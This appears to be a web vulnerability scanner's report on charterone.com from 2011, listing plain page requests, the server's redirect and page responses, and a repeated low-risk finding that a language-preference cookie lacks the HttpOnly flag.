GET /loans/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2floans%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 184
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loans/home-equity.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2floans%2fhome-equity.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252floans%252fhome-equity.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /moneyhelp/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:14:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:24:12 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 19634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/home-refinance.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fmortgages%2fhome-refinance.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 195
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fmortgages%252fhome-refinance.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/overview.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 148
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/faq.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2ffaq.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 189
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252ffaq.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/mobile-banking/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2fmobile-banking%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 212
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252fmobile-banking%252fdefault.aspx">here</a>.</h2> </bo ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/olbdemo.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:14:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2folbdemo.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 193
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252folbdemo.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /open-account.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fopen-account.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fopen-account.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal-investing/overview.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Feb 2011 22:16:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.charterone.com/personal-investing/default.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /promotions/q1a/web.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: CampaignInfo=url%3d%2fpromotions%2fq1a%2fweb.aspx%3bdate%3d2%2f2%2f2011+12%3a00%3a00+AM%3bmeta%3dref%253d%253bpath%253d%252fpromotions%252fq1a%252fweb.aspx; expires=Mon, 01-Aug-2011 21:15:29 GMT; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:29 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 10578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 194
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/cds.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fcds.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 190
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fcds.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/college-saver.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fcollege-saver.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 200
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fcollege-saver.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 194
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/homebuyer-savings.aspx?WT.ac=homebuyersavings HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:13:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fhomebuyer-savings.aspx%3fwt.ac%3dhomebuyersavings Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 235
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fhomebuyer-savings.aspx%253fwt.ac%253dhomebuyersaving ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/money-markets.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsavings-and-cds%2fmoney-markets.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 200
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsavings-and-cds%252fmoney-markets.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /security/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:37:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:47:55 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 14986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /security/equal-housing-lender.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:26:23 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 13792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /services/standard-overdraft-practices.aspx?WT.ac=standardoverdraftpractices HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:35 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsmall-business%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 193
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsmall-business%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-banking-online.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com//small-business/business-banking-online.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 189
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-banking-online.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-checking-accounts.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
